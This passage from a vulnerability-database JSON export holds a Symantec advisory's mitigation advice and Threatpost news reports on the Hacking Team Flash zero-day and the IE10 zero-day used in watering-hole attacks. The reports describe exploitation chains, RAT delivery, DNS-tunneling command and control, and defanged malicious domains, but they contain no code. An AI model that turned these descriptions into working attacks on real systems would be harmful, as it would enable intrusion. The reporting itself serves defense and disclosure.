13.0.0.264 \n * Adobe Flash Player 13.0.0.269 \n * Adobe Flash Player 13.0.0.277 \n * Adobe Flash Player 13.0.0.281 \n * Adobe Flash Player 13.0.0.289 \n * Adobe Flash Player 13.0.0.292 \n * Adobe Flash Player 13.0.0.296 \n * Adobe Flash Player 14.0.0.125 \n * Adobe Flash Player 14.0.0.145 \n * Adobe Flash Player 14.0.0.176 \n * Adobe Flash Player 14.0.0.177 \n * Adobe Flash Player 14.0.0.179 \n * Adobe Flash Player 15.0.0.152 \n * Adobe Flash Player 15.0.0.189 \n * Adobe Flash Player 15.0.0.223 \n * Adobe Flash Player 15.0.0.239 \n * Adobe Flash Player 15.0.0.242 \n * Adobe Flash Player 15.0.0.246 \n * Adobe Flash Player 16.0.0.234 \n * Adobe Flash Player 16.0.0.235 \n * Adobe Flash Player 16.0.0.257 \n * Adobe Flash Player 16.0.0.287 \n * Adobe Flash Player 16.0.0.291 \n * Adobe Flash Player 16.0.0.296 \n * Adobe Flash Player 16.0.0.305 \n * Adobe Flash Player 17.0.0.134 \n * Adobe Flash Player 17.0.0.169 \n * Adobe Flash Player 17.0.0.188 \n * Adobe Flash Player 18.0.0.143 \n * Adobe Flash Player 18.0.0.160 \n * Adobe Flash Player 18.0.0.161 \n * Adobe Flash Player 18.0.0.194 \n * Adobe Flash Player 2 \n * Adobe Flash Player 3 \n * Adobe Flash Player 4 \n * Adobe Flash Player 6.0.21.0 \n * Adobe Flash Player 6.0.79 \n * Adobe Flash Player 7 \n * Adobe Flash Player 7.0.1 \n * Adobe Flash Player 7.0.14.0 \n * Adobe Flash Player 7.0.19.0 \n * Adobe Flash Player 7.0.24.0 \n * Adobe Flash Player 7.0.25 \n * Adobe Flash Player 7.0.53.0 \n * Adobe Flash Player 7.0.60.0 \n * Adobe Flash Player 7.0.61.0 \n * Adobe Flash Player 7.0.63 \n * Adobe Flash Player 7.0.66.0 \n * Adobe Flash Player 7.0.67.0 \n * Adobe Flash Player 7.0.68.0 \n * Adobe Flash Player 7.0.69.0 \n * Adobe Flash Player 7.0.70.0 \n * Adobe Flash Player 7.0.73.0 \n * Adobe Flash Player 7.1 \n * Adobe Flash Player 7.1.1 \n * Adobe Flash Player 7.2 \n * Adobe Flash Player 8 \n * Adobe Flash Player 8.0.22.0 \n * Adobe Flash Player 8.0.24.0 \n * Adobe Flash Player 8.0.33.0 \n * Adobe Flash Player 8.0.34.0 \n * Adobe Flash Player 8.0.35.0 \n * Adobe Flash Player 8.0.39.0 \n * Adobe Flash Player 8.0.42.0 \n * Adobe Flash Player 9 \n * Adobe Flash Player 9.0.112.0 \n * Adobe Flash Player 9.0.114.0 \n * Adobe Flash Player 9.0.115.0 \n * Adobe Flash Player 9.0.124.0 \n * Adobe Flash Player 9.0.125.0 \n * Adobe Flash Player 9.0.151 .0 \n * Adobe Flash Player 9.0.152 .0 \n * Adobe Flash Player 9.0.155.0 \n * Adobe Flash Player 9.0.159.0 \n * Adobe Flash Player 9.0.16 \n * Adobe Flash Player 9.0.18D60 \n * Adobe Flash Player 9.0.20 \n * Adobe Flash Player 9.0.20.0 \n * Adobe Flash Player 9.0.246 0 \n * Adobe Flash Player 9.0.246.0 \n * Adobe Flash Player 9.0.260.0 \n * Adobe Flash Player 9.0.262 \n * Adobe Flash Player 9.0.262.0 \n * Adobe Flash Player 9.0.277.0 \n * Adobe Flash Player 9.0.28.0 \n * Adobe Flash Player 9.0.280 \n * Adobe Flash Player 9.0.283.0 \n * Adobe Flash Player 9.0.289.0 \n * Adobe Flash Player 9.0.31.0 \n * Adobe Flash Player 9.0.45.0 \n * Adobe Flash Player 9.0.47.0 \n * Adobe Flash Player 9.0.48.0 \n * Adobe Flash Player 9.0.8.0 \n * Adobe Flash Player 9.0.9.0 \n * Adobe Flash Player 9.125.0 \n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n * Redhat Enterprise Linux Desktop Supplementary 6 \n * Redhat Enterprise Linux Server Supplementary 6 \n * Redhat Enterprise Linux Server Supplementary EUS 6.6.z \n * Redhat Enterprise Linux Workstation Supplementary 6 \n * Redhat RHEL Desktop Supplementary Client 5 \n * Redhat RHEL Supplementary Server 5 \n * SuSE openSUSE Evergreen 11.4 \n\n### Recommendations\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from a successful exploit. \n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo limit exposure to these and other latent vulnerabilities, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nTo reduce the likelihood of attacks, never visit sites of questionable integrity or follow links provided by unfamiliar or untrusted sources.\n\n**Implement multiple redundant layers of security.** \nAs an added precaution, deploy memory-protection schemes (such as nonexecutable stack/heap configuration and randomly mapped memory segments). This may complicate exploits of memory-corruption vulnerabilities.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, run applications with the minimal amount of privileges required for functionality. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "modified": "2015-07-07T00:00:00", "id": "SMNTC-75568", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/75568", "published": "2015-07-07T00:00:00", "type": "symantec", "title": "Adobe Flash Player ActionScript 3 ByteArray Use After Free Remote Memory Corruption Vulnerability", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T22:56:36", "bulletinFamily": "info", "cvelist": ["CVE-2014-0322", "CVE-2015-5119"], "description": "Handlers for three major exploit kits have managed to utilize in short order a [zero-day vulnerability in Adobe Flash Player](<https://helpx.adobe.com/security/products/flash-player/apsa15-03.html>) uncovered among the 400 Gb of data stolen from Hacking Team.\n\nExperts, including French researcher [Kafeine](<http://malware.dontneedcoffee.com/2015/07/hackingteam-flash-0d-cve-2015-xxxx-and.html>) and a number of others from security companies, revealed last night that the Angler, Neutrino, and Nuclear kits had incorporated exploits for the zero day, which [Adobe has patched](<https://helpx.adobe.com/security/products/flash-player/apsb15-16.html>).\n\nThe [Hacking Team breach](<https://threatpost.com/hackers-release-hacking-team-internal-documents-after-breach/113612>) was disclosed on Sunday and by Monday afternoon, word of the Flash zero day, along with an unpatched Windows kernel vulnerability, was circulating. Though the Hacking Team data included only a proof of concept that opened the computer\u2019s calculator, an extensive read-me document that accompanied it likely helped pave the way to the exploits.\n\n> Flash 0day from [#HackingTeam](<https://twitter.com/hashtag/HackingTeam?src=hash>) with a nice readme. Works very well on Chrome etc. <http://t.co/nfqck54YhT> [pic.twitter.com/8uAQuUIXGV](<http://t.co/8uAQuUIXGV>)\n> \n> \u2014 webDEViL (@w3bd3vil) [July 6, 2015](<https://twitter.com/w3bd3vil/status/618168863708962816>)\n\nA [Metasploit module](<https://github.com/rapid7/metasploit-framework/commit/2cdaace42f8f121e97f36f37fe1b3835dbeaef0a>) was also developed and integrated into the framework, before integration into the exploit kits, Kafeine told Threatpost via email.\n\nAdobe issued an advisory late Tuesday afternoon that it would today release an updated Flash Player. The vulnerability, CVE-2015-5119, affects Flash Player version 18.0.0.194 and earlier for Windows, Macintosh and Linux systems.\n\nSecurity company Bromium, meanwhile, published an [analysis](<http://labs.bromium.com/2015/07/07/adobe-flash-zero-day-vulnerability-exposed-to-public/>) of the vulnerability, which is a byte array use-after-free memory issue that allows an attacker to gain control of a Windows machine running the vulnerable Flash Player. Researcher Nick Cano wrote that Hacking Team built its proof-of-concept code based on a 2014 vulnerability known as the ActionScript-Spray attack (CVE-2014-0322) which took advantage of a UAF bug in Internet Explorer to gain access to the heap of a process.\n\n\u201cHackingTeam\u2019s exploit uses this idea to achieve execution, but uses a UAF bug internal to the ActionScript 3 engine,\u201d Cano wrote. The Bromium analysis provides in-depth detail on the vulnerability and how the Hacking Team PoC exploits it.\n\nCano said the Hacking Team exploits comes with shellcode for 32- and 64-bit Windows machines, as well as Mac OS X 64-bit machines, and mitigation bypasses for Microsoft\u2019s free EMET tool. .\n\n\u201cWe\u2019ve tested this exploit with the latest updated Flash Player 18 and Internet Explorer which indicates that this is clearly a zero day risk to internet users today,\u201d Cano wrote. \u201cThis exploit has the potential to completely own almost any system that it hits, and can be reliably blocked by leveraging robust isolation technologies.\u201d\n\nResearchers from China\u2019s 360Vulcan Team, who cashed in big at this year\u2019s Pwn2Own contest, also published an [analysis](<https://translate.google.com/translate?depth=1&hl=en&ie=UTF8&prev=_t&rurl=translate.google.com&sl=auto&tl=en&u=http://blogs.360.cn/blog/hacking-team-flash-0day/>) of the vulnerability (translated).\n\nHacking Team is a controversial player in security, selling intrusion software flagged by the Wassenaar Arrangement used to monitor users\u2019 computers. It, along with others such as Gamma Corp., has been criticized for selling software that violates not only privacy but human rights; the companies are accused of selling their products to oppressive governments. Among the Hacking Team data were invoices showing sales to the Sudan, Ethiopia and other sanctioned nations, drawing the[ ire of the European Parliament](<https://threatpost.com/eu-lawmaker-wants-answers-on-hacking-team-sales-to-sanctioned-countries/113638>), which yesterday asked some pointed questions about the incident.\n", "modified": "2015-07-09T13:52:36", "published": "2015-07-08T11:19:02", "id": "THREATPOST:342B067585A04A2E2EA010EA2C33DC1B", "href": "https://threatpost.com/hacking-team-flash-zero-day-weaponized-in-exploit-kits/113663/", "type": "threatpost", "title": "Hacking Team Flash Zero Day Weaponized in Exploit Kits", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:21", "bulletinFamily": "info", "cvelist": ["CVE-2014-0322"], "description": "Attackers were able to compromise the U.S. Veterans of Foreign Wars\u2019 website this week and serve up a previously unknown zero day exploit in Internet Explorer 10, and while motivation behind the campaign is still unclear, experts are speculating its aim was to procure military intelligence.\n\nAccording to [researchers at FireEye](<http://www.fireeye.com/blog/uncategorized/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html>), the campaign, dubbed Operation SnowMan, follows in the footsteps of operations DeputyDog and Ephemeral Hydra, two campaigns that recently used IE zero days to carry out watering hole attacks, dropping remote access Trojans to takeover machines.\n\nWhile a number of retired military personnel use the site, VFW.org, active military personnel also frequent it, potentially putting sensitive military information at risk.\n\nFireEye noticed the \u201cclassic drive-by download\u201d style attack on Tuesday after discovering that an iframe had been appended to the beginning of the website\u2019s HTML code. The iframe contains a corrupted Flash object that goes on to trigger the IE 10 vulnerability, (CVE-2014-0322), a use-after-free bug in the browser.\n\nFrom there the Flash file downloads a XOR-encoded payload from a remote server, decodes it and executes it.\n\nAccording to FireEye it starts off as a .JPG image, then the .JPG is attached to the shellcode which is executed to produce two files, sqlrenew.txt and stream.exe, before its executed with a Windows API call.\n\nLike DeputyDog, SnowMan deploys an HTTPS version of Gh0stRAT, a remote access Trojan that has been spotted connecting to some of the same IP addresses as DeputyDog. SnowMan can let the attacker modify one byte of memory at an arbitrary address, meaning it can also bypass ASLR, or Address Space Layout Randomization, along with DEP, Data Execution Prevention, both security features in Windows.\n\nA quintet of researchers \u2013 Darien Kindlund, Dan Caselden, Xiabo Chen, Ned Moran and Mike Scott \u2013 described the campaign on FireEye\u2019s blog yesterday, acknowledging that the time frame of the attack, \u201camid a paralyzing snowstorm at the U.S. Capitol in the days leading up to the Presidents Day holiday weekend,\u201d could have helped the attackers.\n\nWinter storm Pax forced much of the U.S. Capitol to shutter Thursday and Monday of course is a U.S. holiday, President\u2019s Day, a time lapse that could give the attackers the window they need.\n\nWhile the attack is targeted, Jerome Segura, a researcher with [MalwareBytes](<http://blog.malwarebytes.org/exploits-2/2014/02/new-internet-explorer-10-zero-day-used-in-targeted-attacks/>), was able to reproduce the zero-day on Windows 7 on Internet Explorer 10 with the latest version of Flash Player today, showing how easy it may be for an attacker to replicate.\n\nUsers running IE 11 or using Microsoft\u2019s Experience Mitigation Toolkit (EMET) are not at risk because the iframe will abort exploitation under those conditions. The attacker can easily diagnose whether the machine is running EMET by loading an XML string. If the parsed return code fails, it means EMET is not present and the attacker can proceed with the exploit.\n\nAccording to FireEye the threat has several connections to the DeputyDog and Ephemeral Hydra campaigns. All of them use a zero-day to deliver a RAT and use a 0x95-encoded payload \u2013 obfuscated by a .JPG extension \u2013 among other traits.\n\nAdditonally there are a handful of infrastructure overlaps and connections between SnowMan, EphemeralHydra and DeputyDog, including similar domains and IPs. The code found in the Flash file and the way the shellcode is executed share similarities with the attacks as well, suggesting they may be intertwined.\n\nResearchers at security firm Websense had also been looking into the zero day and published information about it shortly after FireEye on Thursday.\n\nWhile Websense agrees with FireEye that the attack appears to have correlations with DeputyDog and EphemeralHydra, Websense claims it first saw it being used in exploits as far back as Jan. 20, about three weeks before FireEye noticed it.\n\nWebsense researchers Alex Watson and Victor Chin write that the attack could also be targeting the Groupement des Industries Francaises Aeronautiques et Spatiales (GIFAS) a French aerospace association.\n\nAccording to the two, the exploit was at one point hosted and distributed via a (U.S.-based) site masquerading as GIFAS\u2019 site, suggesting the French group, or those visiting its website may be a target in addition to those visiting the VFW website.\n\nIt\u2019s a small difference but Websense\u2019s analysis also notes that a malicious Shockwave file, not a Flash file, downloads the .JPG payload that leads to the attack.\n\nCounting the US military this week, FireEye points out the threat actors have targeted a swathe of industries with the attacks including but not limited to: law firms, NGOs, mining companies, Japanese firms and IT companies.\n\nFireEye discovered the [DeputyDog attack](<http://threatpost.com/microsoft-warns-of-new-ie-zero-day/102327>), which also targeted Internet Explorer (both 8 and 9) and delivered a payload via an image file, back in September. That attack targeted Japanese media and government outlets via a watering hole attack, dropping a McRAT variant onto compromised computers.\n\n[Ephemeral Hydra](<http://threatpost.com/ie-zero-day-watering-hole-attack-injects-malicious-payload-into-memory/102891>), which came to light in November and and dropped a McRAT variant, this time on a U.S.-based non-governmental organization in order to secure \u201cindustry-specific intelligence.\u201d\n\nMicrosoft has not yet issued an [official security advisory](<http://technet.microsoft.com/en-us/security/dn530791>) about the vulnerability but it likely will soon, in addition to potentially releasing a workaround for IE 10 users. The company has announced it will not release an out-of-band patch for the vulnerability. Microsoft\u2019s next scheduled Patch Tuesday update is March 11.\n\nMicrosoft acknowledged the vulnerability on Friday and until the update, encouraged users to update to IE 11.\n\n\u201cMicrosoft is aware of limited, targeted attacks against Internet Explorer 10,\u201d a Microsoft spokesperson said, \u201cOur initial investigation has revealed that Internet Explorer 9 and Internet Explorer 10 are affected. We will take the necessary steps to protect customers; meanwhile, we recommend customers upgrade to Internet Explorer 11 for added protection.\u201d\n\nThe news comes just a few days after the Microsoft released [February\u2019s Patch Tuesday](<http://threatpost.com/microsoft-adds-critical-ie-patches-under-the-wire/104214>) update, including the last minute MS14-010 bulletin which addressed 24 vulnerabilities in the browser.\n", "modified": "2014-02-19T19:31:47", "published": "2014-02-14T14:27:27", "id": "THREATPOST:EBDCB2D4445A9B7E6AD0B43B5AE5928B", "href": "https://threatpost.com/new-ie-10-zero-day-targeting-military-intelligence/104272/", "type": "threatpost", "title": "New IE Zero Day Found Targeting Military Intelligence", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:14", "bulletinFamily": "info", "cvelist": ["CVE-2014-0322"], "description": "Attackers have increased their exploitation of an Internet Explorer zero day vulnerability (CVE-2014-0322) [set to be fixed](<http://threatpost.com/microsoft-ie-zero-day-patch-among-november-patch-tuesday-updates/102898>) by Microsoft in its regularly scheduled patch Tuesday release later this afternoon.\n\nAccording to a Websense [report](<http://community.websense.com/blogs/securitylabs/archive/2014/03/10/cyber-criminals-expand-use-of-cve20140322-before-patch-tuesday.aspx>), the exploit source code deployed in at least two incidents \u2013 [one targeting a French aerospace manufacturer and another targeting the website of Veterans of Foreign Wars](<http://threatpost.com/second-group-seen-using-ie-10-zero-day/104344>) \u2013 appears to have been made public. This publication and the subsequent addition of the zero-day to popular crimeware kits seems to have spurred the uptick, at least in part. As Websense notes, once exploit code like this goes public, generating attacks using it is essentially as easy as \u201ccopy and paste.\u201d\n\nAnother factor contributing to the IE zero day vulnerability\u2019s increased exploitation is likely the sheer amount of press it received, especially after researchers announced they would demonstrate [a total bypass of Microsoft\u2019s Enhanced Mitigation Experience Toolkit (EMET)](<http://threatpost.com/researchers-develop-complete-microsoft-emet-bypass/104437>) at CanSecWest in Vancouver this week. This EMET bypass is both relevant and significant because the Redmond, Wash., computer giant urged its customers to [install and run EMET as a temporary mitigation against this very same zero-day](<http://threatpost.com/microsoft-ships-fix-it-for-ie-10-zero-day/104383>).\n\nIn addition to the two websites listed above, Websense reports that three others have been targeted using the same bug: hatobus[dot]co[dot]jp, a Japanese travel site hosted in Tokyo; english[dot]com[dot]tw, the site of a Taiwanese English school hosted in San Antonio, Texas; and chemistry[dot]hku[dot]hk, a Hong Kong University Chemistry Department website hosted in Hong Kong.\n\nIt all began with a typo-squatted variety of giffo[dot]asso[dot]fr, the website of the French aerospace company. The attackers set up giffo[dot]assso[dot]net and hosted a malicious iframe there that led to another part of the same domain where the exploit was actually located.\n\nOnce this attack began garnering media attention, other criminals began copying it, deploying the same code on different lure sites with different payloads.\n\nIn the case of Hatobus, the popular Japanese travel site, attackers buried the redirecting iframe in some javascript files on the site. The exploit too was hosted on the site, which makes it all the more inconspicuous since shady redirects are a generally a dead giveaway for protective software. The exploit code in this case, according to Websense, was nearly identical to that used in the first attack. The only real difference is that the attackers piggybacked a second, Java exploit, which aimed to install a banking trojan targeting members of a popular Japanese bank. Unlike earlier, targeted attacks, the Hatobus variety sought to infect as many machines as possible.\n\nBoth other attacks were essentially copycats as well. Interestingly, in the case of the Taiwanese English school, the exploit was rather flagrantly hosted on the homepage of that website. The Hong Kong University Chemistry Department attack deployed redirecting iframes similar to those in the other incidents.\n\n\u201cIt\u2019s evident that the repercussions of exploit code of an unpatched vulnerability that found its way to the public domain can have quite an impact; exploit code that has been crafted for a targeted attack is virtually later on copied and used to drop crimeware binaries,\u201d wrote Websense\u2019s Elad Sharf. \u201cWe could see that the exploit code for CVE-2014-0322 was encompassed and served in a variety of ways as it \u201cevolved\u201d in scale: starting from being utilized on a cybersquatted lure website used in a low-volume and selected \u201cunder the radar\u201d targeted attacks to being served through hidden iframes and exploit code that was directly placed on compromised websites with the ultimate aim to impact as many browsing users as possible with crimeware.\u201d\n", "modified": "2014-03-11T18:30:05", "published": "2014-03-11T14:30:05", "id": "THREATPOST:A72A91268C8C0871DE1E44E25B215AAF", "href": "https://threatpost.com/hackers-milk-ie-zero-day-before-patch/104713/", "type": "threatpost", "title": "IE Zero Day Exploits Increase Just Before Patch", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:17", "bulletinFamily": "info", "cvelist": ["CVE-2015-5119"], "description": "Palo Alto Networks is reporting a shift in malware tactics used by the APT group Wekby that has added a rare but effective new tool to its bag of tricks. The security [firm reported on Tuesday](<http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/>) that over the past week, Wekby attackers are turning to the technique known as DNS tunneling in lieu of more conventional HTTP delivery of command and controls for remote access control of infected computer networks.\n\nResearchers discovered the change in strategy while monitoring an undisclosed U.S.-based high-tech firm targeted by the gang. Palo Alto Networks call the DNS tunneling malware pisloader, adding it has existed for some time but is seldom used. The use of the DNS-based attacks differs from the Wekby\u2019s go-to malware HTTPBrowser, which is still used widely by the group, according to Ryan Olson, researcher at Palo Alto Networks Unit 42 team.\n\n\u201cWe found it really interesting that this pisloader malware technique not only was being used to exfiltration data but also as a command and control mechanism,\u201d Olson told Threatpost. The malware is uncommon because of its limited use case for attacks and that it requires above average technical sophistication by the perpetrator to configure. Domains used in the Wekby attack outlined by Palo Alto Networks include globalprint-us[.]com, ns1.logitech-usa[.]com and intranetwabcam[.]com.\n\nDNS tunneling takes advantage of the TXT transport layer within the DNS protocol used by top and second level domain name system servers. A maximum of 255 bytes of data can be transported via DNS request between endpoint and a DNS server using the TXT layer. For Wekby attackers that have already gained a foothold on targeted systems, the DNS tunneling of commands and DNS tunneling used to remove of data is extremely slow, but well suited for long term APT campaigns.\n\nIn the case of pisloader, attackers would use their own DNS server that they controlled to send and receive C2 commands to infected computers. Embedded in the DNS TXT layer of the call and responses between infected client and Wekby\u2019s DNS server would be a mix of five instructions including; collect victim system information, list drives on victim machine, list file information for provided directory, upload a file to the victim machine, and spawn a command shell.\n\nTo obfuscate those commands, Wekby attackers use base32 encoding on the DNS TXT layer making it appear that the DNS TXT was simply garbage strings of DNS metadata.\n\nFor attackers, DNS tunneling is a double-edged sword, Olson said. \u201cPisloader is extremely hard to discover if you\u2019re not already looking for it. But with a limit of 255 bytes per message uploading anything could take days to weeks without sounding alarms,\u201d he said. But because pisloader was able to skirt many security products that don\u2019t inspect DNS traffic properly, attackers are willing to sacrifice speed for stealth, Olson said. For those reasons the use of pisloader is extremely rare, even among Wekby gangs. In fact, the use of DNS as a C2 protocol has never been widely adopted by APT gangs. Olson said, there are very few malware families with similar DNS tunneling attributes such a [FrameworkPOS](<https://blog.gdatasoftware.com/2014/10/23942-new-frameworkpos-variant-exfiltrates-data-via-dns-requests>), [C3PRO-RACCOON](<https://www.forcepoint.com/sites/default/files/resources/files/report_jaku_analysis_of_botnet_campaign_en_0.pdf>) and [FeederBot](<http://blog.cj2s.de/archives/28-Feederbot-a-bot-using-DNS-as-carrier-for-its-CC.html>).\n\nPalo Alto Networks said it was able to link the pisloader malware to Wekby because it shared many similar characteristics found within the HTTPBrowser RAT family \u2013 commonly used by Wekby. Palo Alto Networks said the Wekby APT group remains active, targeting many U.S.-based healthcare, telecommunications, aerospace, defense, and high-tech companies.\n\n\u201cThe group is known to leverage recently released exploits very shortly after those exploits are available, such as in the case of HackingTeam\u2019s Flash zero-day exploit,\u201d [according to Palo Alto Networks report on the pisloader](<http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/>). Palo Alto Networks has said that Wekby has often leveraged [the zero-day Adobe Flash Exploit](<https://threatpost.com/hacking-team-flash-zero-day-weaponized-in-exploit-kits/113663/>) (CVE-2015-5119) via spear phishing campaigns. That said, Olson told Threatpost researchers couldn\u2019t be sure of the exploit used to gain a foothold in the high-tech firm targeted by Wekby attackers.\n", "modified": "2016-05-25T20:41:40", "published": "2016-05-25T14:58:52", "id": "THREATPOST:944377914FB1A58CB3F9F096F78260E0", "href": "https://threatpost.com/wekby-apt-gang-using-dns-tunneling-for-command-and-control/118303/", "type": "threatpost", "title": "Wekby APT Gang Seen Using DNS Tunneling for Command and Control", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:36", "bulletinFamily": "info", "cvelist": ["CVE-2015-5119"], "description": "Adobe tomorrow is expected to release an updated version of Flash Player that will patch a zero-day vulnerability uncovered among the 400 GB of data stolen from Hacking Team.\n\nThe controversial Italian intrusion and surveillance software vendor was breached and on Sunday, private documents, including internal emails and customer invoices, were leaked. The published loot shows sales to oppressive governments, a practice the company\u2019s marketing material says it did not engage in.\n\nAdobe\u2019s [advisory](<https://helpx.adobe.com/security/products/flash-player/apsa15-03.html>), published a short time ago, is short on details other than to say that the vulnerability has likely been publicly exploited. The vulnerability, CVE-2015-5119, affects Flash Player version 18.0.0.194 and earlier for Windows, Macintosh and Linux systems.\n\n\u201cSuccessful exploitation could cause a crash and potentially allow an attacker to take control of the affected system,\u201d said the Adobe advisory. The vulnerability was reported to Adobe by researcher Morgan Marquis-Boire and Google Project Zero. Marquis-Boire and Adobe confirmed to Threatpost that the patch will address the Hacking Team zero day.\n\nAs researchers comb through the hacked documents and data, there are likely to be other unreported flaws in popular software. The Grugq, a security researcher based in Bangkok, said on his Twitter feed that a Windows zero-day is also documented.\n\n> All that fear about 0day and HackingTeam had only 2 that are relevant (flash + win32k).\n> \n> \u2014 the grugq (@thegrugq) [July 7, 2015](<https://twitter.com/thegrugq/status/618293343819165696>)\n\nHacking Team plays in a market heavily scrutinized by security and privacy experts who say that oppressive governments such as Sudan and Ethiopia\u2014both Hacking Team customers\u2014can abuse the software to keep tabs on citizens and suppress the work of activists, journalists and others. Citizen Lab at the University of Toronto published an open [letter](<https://citizenlab.org/2015/03/open-letter-hacking-team-march-2015/>) earlier this year to Hacking Team executives asking why Ethiopian journalists were targeted by one of their customers, a supposed violation of the Milan-based company\u2019s policy.\n\nSince the Hacking Team breach was disclosed on Sunday afternoon, the story has moved quickly as more details are disclosed about customers and internal operations; the highest revenue-producing countries for Hacking Team are Mexico, Italy and Morocco. The U.S. is also listed among its customers, with the Drug Enforcement Agency and FBI buying spyware from the firm.\n\nIt was also disclosed that Hacking Team had an [enterprise developer certificate from Apple](<https://threatpost.com/hacking-team-couldnt-hack-your-iphone/113636>), allowing it to build sign OS X and iOS applications and distribute them internally. Apple has since revoked Hacking Team\u2019s certificate.\n\nThe EU Parliament, meanwhile, today asked the European Commission whether Hacking Team\u2019s sales to certain countries is a [violation of EU sanctions](<https://threatpost.com/eu-lawmaker-wants-answers-on-hacking-team-sales-to-sanctioned-countries/113638>). Marietje Schaake, a Dutch member of the European Union Parliament, has been outspoken about the use of surveillance programs by sanctioned nations and likened companies such as Hacking Team to modern-day arms dealers.\n", "modified": "2015-07-07T19:46:59", "published": "2015-07-07T15:46:59", "id": "THREATPOST:36DC9B1F1EFE6F30B37A56180A6A6163", "href": "https://threatpost.com/adobe-to-patch-hacking-team-zero-day-in-flash/113658/", "type": "threatpost", "title": "Adobe to Patch Hacking Team Flash Zero Day", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:15", "bulletinFamily": "info", "cvelist": ["CVE-2014-0322", "CVE-2017-11882"], "description": "Microsoft will patch a lingering zero-day vulnerability in Internet Explorer next Tuesday, one of five bulletins it will release as part of its [March 2014 Patch Tuesday security updates](<http://technet.microsoft.com/en-us/security/bulletin/ms14-mar>).\n\nThe IE 10 zero-day was disclosed close to a month ago when researchers at FireEye reported on [Operation SnowMan](<http://threatpost.com/new-ie-10-zero-day-targeting-military-intelligence/104272>), an espionage campaign that compromised the U.S. Veterans of Foreign Wars website. The attackers, experts said, were targeting the computers of active military personnel who visit the site seeking benefits information.\n\nFireEye said a Flash exploit was used via an iFrame to trigger the [use-after-free vulnerability](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0322>) in the browser. Compromised computers were hit with a remote access Trojan that stole data; experts speculate the attackers were hoping to gain steal military secrets from the active service members who use the site as a resource.\n\nIt was soon discovered that a [second and unrelated group of attackers](<http://threatpost.com/second-group-seen-using-ie-10-zero-day/104344>) was also exploiting the IE 10 zero day, this time to impersonate a number of French aerospace companies, redirecting legitimate traffic to the hacker-controlled domains.\n\nResearchers at Seculert said malware that changes host files on infected machines in order to add in these malicious domains had previously been the domain of pharming attacks used for fraud.\n\n\u201cThis is the first time we have seen a malware change a host file for a purpose other than fraud perpetuated by pharming or for disabling access to specific websites,\u201d Seculert CTO Aviv Raff said.\n\nMicrosoft had shipped a [Fix-It mitigation for the zero-day](<http://threatpost.com/microsoft-ships-fix-it-for-ie-10-zero-day/104383>) as a stopgap until a patch was ready. Microsoft said IE 9 also contains the same vulnerability, but it was not being exploited. IE 11 users running the Enhanced Mitigation Experience Toolkit (EMET) were also protected against these attacks.\n\nThe IE update is one of two critical bulletins expected next week. The other is also a remote code execution vulnerability in Windows.\n\nAll five bulletins announced by Microsoft today affect versions of Windows or IE all the way back to Windows XP, which Microsoft will no longer support with security updates as of April 8.\n\n\u201cWindows XP is affected by all five updates and there is really no reason to expect this picture to change: Windows XP will continue to be impacted by the majority of vulnerabilities found in the WIndows ecosystem, but you will not be able to address the issues anymore,\u201d said Qualys CTO Wolfgang Kandek. \u201cYou need a strategy for the XP machines remaining in your infrastructure. We are still seeing significant number of XP machines in our scans.\u201d\n\nThe remaining three bulletins were rated \u201cimportant\u201d by Microsoft and include elevation of privilege vulnerability and security feature bypass issues in Windows and another security feature bypass issue in Silverlight.\n\n\u201cOf the remaining issues, one is an important privilege issue, probably going to be a kernel or kernel driver patch; never something to ignore but less important than a critical/remote issue,\u201d said Ross Barrett, senior manager of security engineering at Rapid 7. \u201cThe other two are the seldom seen \u2018security mechanism bypasses\u2019, probably the same issue being patched in Windows and in Silverlight. We will have to wait and see how exploitable this turns out to be. If it turns out that some of these issues are in the wild and under exploitation, then that will be change the circumstances of what to prioritize.\u201d\n\nSilverlight, meanwhile, has relatively limited adoption and given Microsoft\u2019s support of Flash in IE 11, it\u2019s not out of the question it will be discontinued eventually, said Tyler Reguly, manager of security research at Tripwire.\n\n\u201cIn a world filled with so many web technologies, vendors could better serve the public by simply limiting choice and removing dead weight,\u201d Reguly said.\n", "modified": "2014-03-06T19:44:16", "published": "2014-03-06T14:44:16", "id": "THREATPOST:B3C0097CBA4C334709D99BB9D477A6DD", "href": "https://threatpost.com/microsoft-to-patch-ie-10-zero-day-on-patch-tuesday/104653/", "type": "threatpost", "title": "Microsoft to Patch IE 10 Zero Day March 2014 Patch Tuesday", "cvss": {"score": 9.3, "vector": 